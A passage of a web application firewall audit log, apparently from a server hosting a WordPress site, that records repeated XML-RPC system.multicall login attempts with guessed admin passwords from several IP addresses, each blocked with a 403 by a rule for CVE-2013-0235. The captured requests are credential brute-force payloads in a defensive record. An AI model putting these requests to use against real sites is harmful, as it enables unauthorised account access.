close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --787d491b-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin_1 --787d491b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --787d491b-E-- --787d491b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.205.48.162 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101182352468 4632 (- - -) Stopwatch2: 1749101182352468 4632; combined=3627, p1=364, p2=3074, p3=0, p4=0, p5=108, sr=77, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --787d491b-Z-- --bfd38150-A-- [05/Jun/2025:12:26:29 +0700] aEEqhVwdJdhOudw5hdzPGAAAAI4 103.236.140.4 35916 103.236.140.4 8181 --bfd38150-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.42.58.162 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.42.58.162 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --bfd38150-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin_1 --bfd38150-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bfd38150-E-- --bfd38150-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.42.58.162 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101189884825 4798 (- - -) Stopwatch2: 1749101189884825 4798; combined=3772, p1=428, p2=3049, p3=0, p4=0, p5=161, sr=81, sw=134, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bfd38150-Z-- --94260a60-A-- [05/Jun/2025:12:26:35 +0700] aEEqi-th7G2xELALzPYhkAAAANQ 103.236.140.4 35920 103.236.140.4 8181 --94260a60-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.214.55.193 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.214.55.193 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --94260a60-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin_1 --94260a60-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --94260a60-E-- --94260a60-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.214.55.193 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101195410608 5188 (- - -) Stopwatch2: 1749101195410608 5188; combined=3615, p1=455, p2=3016, p3=0, p4=0, p5=85, sr=80, sw=59, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94260a60-Z-- --0c8dbd22-A-- [05/Jun/2025:12:26:55 +0700] aEEqn-th7G2xELALzPYhkgAAANc 103.236.140.4 35924 103.236.140.4 8181 --0c8dbd22-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.95.2.150 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.95.2.150 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0c8dbd22-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin2000 --0c8dbd22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c8dbd22-E-- --0c8dbd22-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.95.2.150 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101215276170 5220 (- - -) Stopwatch2: 1749101215276170 5220; combined=3838, p1=443, p2=3226, p3=0, p4=0, p5=99, sr=87, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c8dbd22-Z-- --c96c7b0c-A-- [05/Jun/2025:12:27:16 +0700] aEEqtOth7G2xELALzPYhmgAAAMQ 103.236.140.4 35940 103.236.140.4 8181 --c96c7b0c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 91.134.248.253 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 91.134.248.253 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c96c7b0c-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin159 --c96c7b0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c96c7b0c-E-- --c96c7b0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 91.134.248.253 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101236781269 6248 (- - -) Stopwatch2: 1749101236781269 6248; combined=4425, p1=514, p2=3743, p3=0, p4=0, p5=101, sr=93, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c96c7b0c-Z-- --8cb3271f-A-- [05/Jun/2025:12:27:29 +0700] aEEqweth7G2xELALzPYhnQAAAMg 103.236.140.4 35948 103.236.140.4 8181 --8cb3271f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.205.48.162 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.205.48.162 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --8cb3271f-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh2012 --8cb3271f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8cb3271f-E-- --8cb3271f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.205.48.162 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101249754928 5354 (- - -) Stopwatch2: 1749101249754928 5354; combined=3948, p1=488, p2=3286, p3=0, p4=0, p5=102, sr=118, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8cb3271f-Z-- --ed4c4d56-A-- [05/Jun/2025:12:27:47 +0700] aEEq0-th7G2xELALzPYhoAAAAMw 103.236.140.4 35954 103.236.140.4 8181 --ed4c4d56-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.18.250.175 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.18.250.175 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --ed4c4d56-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminF*uckYou --ed4c4d56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed4c4d56-E-- --ed4c4d56-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.18.250.175 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101267065449 3703 (- - -) Stopwatch2: 1749101267065449 3703; combined=2571, p1=332, p2=2128, p3=0, p4=0, p5=65, sr=60, sw=46, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed4c4d56-Z-- --c7b5a41e-A-- [05/Jun/2025:12:29:35 +0700] aEErP-th7G2xELALzPYhqAAAANQ 103.236.140.4 35974 103.236.140.4 8181 --c7b5a41e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.214.55.193 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.214.55.193 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c7b5a41e-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin987654321 --c7b5a41e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7b5a41e-E-- --c7b5a41e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.214.55.193 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101375337203 3926 (- - -) Stopwatch2: 1749101375337203 3926; combined=3097, p1=345, p2=2609, p3=0, p4=0, p5=83, sr=71, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7b5a41e-Z-- --628c2761-A-- [05/Jun/2025:12:33:58 +0700] aEEsRuth7G2xELALzPYhwwAAAMI 103.236.140.4 36070 103.236.140.4 8181 --628c2761-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.205.48.162 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.205.48.162 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --628c2761-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh@admin --628c2761-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --628c2761-E-- --628c2761-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.205.48.162 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101638297764 4770 (- - -) Stopwatch2: 1749101638297764 4770; combined=3593, p1=394, p2=3033, p3=0, p4=0, p5=96, sr=81, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --628c2761-Z-- --cc812661-A-- [05/Jun/2025:12:34:00 +0700] aEEsSOth7G2xELALzPYhxAAAAMM 103.236.140.4 36072 103.236.140.4 8181 --cc812661-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 91.134.248.253 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 91.134.248.253 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --cc812661-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminpass@123 --cc812661-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc812661-E-- --cc812661-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 91.134.248.253 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101640100216 5941 (- - -) Stopwatch2: 1749101640100216 5941; combined=4250, p1=503, p2=3570, p3=0, p4=0, p5=105, sr=99, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc812661-Z-- --5caa733b-A-- [05/Jun/2025:12:34:08 +0700] aEEsUOth7G2xELALzPYhxgAAAMU 103.236.140.4 36078 103.236.140.4 8181 --5caa733b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.82.25.111 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.82.25.111 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5caa733b-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh@admin --5caa733b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5caa733b-E-- --5caa733b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.82.25.111 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101648018520 5573 (- - -) Stopwatch2: 1749101648018520 5573; combined=4068, p1=443, p2=3393, p3=0, p4=0, p5=139, sr=82, sw=93, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5caa733b-Z-- --dc44577e-A-- [05/Jun/2025:12:34:35 +0700] aEEsayrHpfaS2Cuwh8XUNwAAAEY 103.236.140.4 36090 103.236.140.4 8181 --dc44577e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.214.55.193 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.214.55.193 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --dc44577e-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix123! --dc44577e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc44577e-E-- --dc44577e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.214.55.193 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101675918777 4616 (- - -) Stopwatch2: 1749101675918777 4616; combined=3540, p1=387, p2=2986, p3=0, p4=0, p5=97, sr=81, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc44577e-Z-- --e9e05739-A-- [05/Jun/2025:12:35:36 +0700] aEEsqH-K7ToMdu-YSIIkagAAAAk 103.236.140.4 36110 103.236.140.4 8181 --e9e05739-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.214.55.193 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.214.55.193 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --e9e05739-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh@admin --e9e05739-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9e05739-E-- --e9e05739-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.214.55.193 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101736096463 5610 (- - -) Stopwatch2: 1749101736096463 5610; combined=4057, p1=450, p2=3416, p3=0, p4=0, p5=113, sr=89, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9e05739-Z-- --77f1fe37-A-- [05/Jun/2025:12:35:40 +0700] aEEsrOth7G2xELALzPYh1QAAANU 103.236.140.4 36112 103.236.140.4 8181 --77f1fe37-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 91.134.248.253 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 91.134.248.253 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --77f1fe37-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh# --77f1fe37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77f1fe37-E-- --77f1fe37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 91.134.248.253 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101740993558 4471 (- - -) Stopwatch2: 1749101740993558 4471; combined=3465, p1=379, p2=2920, p3=0, p4=0, p5=97, sr=79, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77f1fe37-Z-- --f362213f-A-- [05/Jun/2025:12:35:45 +0700] aEEsseth7G2xELALzPYh2AAAANg 103.236.140.4 36118 103.236.140.4 8181 --f362213f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.95.2.150 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.95.2.150 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --f362213f-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin# --f362213f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f362213f-E-- --f362213f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.95.2.150 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101745281859 4429 (- - -) Stopwatch2: 1749101745281859 4429; combined=3498, p1=392, p2=2942, p3=0, p4=0, p5=96, sr=79, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f362213f-Z-- --e23dce2c-A-- [05/Jun/2025:12:37:44 +0700] aEEtKOth7G2xELALzPYh7AAAANU 103.236.140.4 36176 103.236.140.4 8181 --e23dce2c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.82.25.111 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.82.25.111 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --e23dce2c-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin1234$ --e23dce2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e23dce2c-E-- --e23dce2c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.82.25.111 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101864199110 5028 (- - -) Stopwatch2: 1749101864199110 5028; combined=3746, p1=457, p2=3122, p3=0, p4=0, p5=98, sr=86, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e23dce2c-Z-- --272ee562-A-- [05/Jun/2025:12:38:03 +0700] aEEtO-th7G2xELALzPYh8AAAAME 103.236.140.4 36188 103.236.140.4 8181 --272ee562-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.214.55.193 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.214.55.193 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 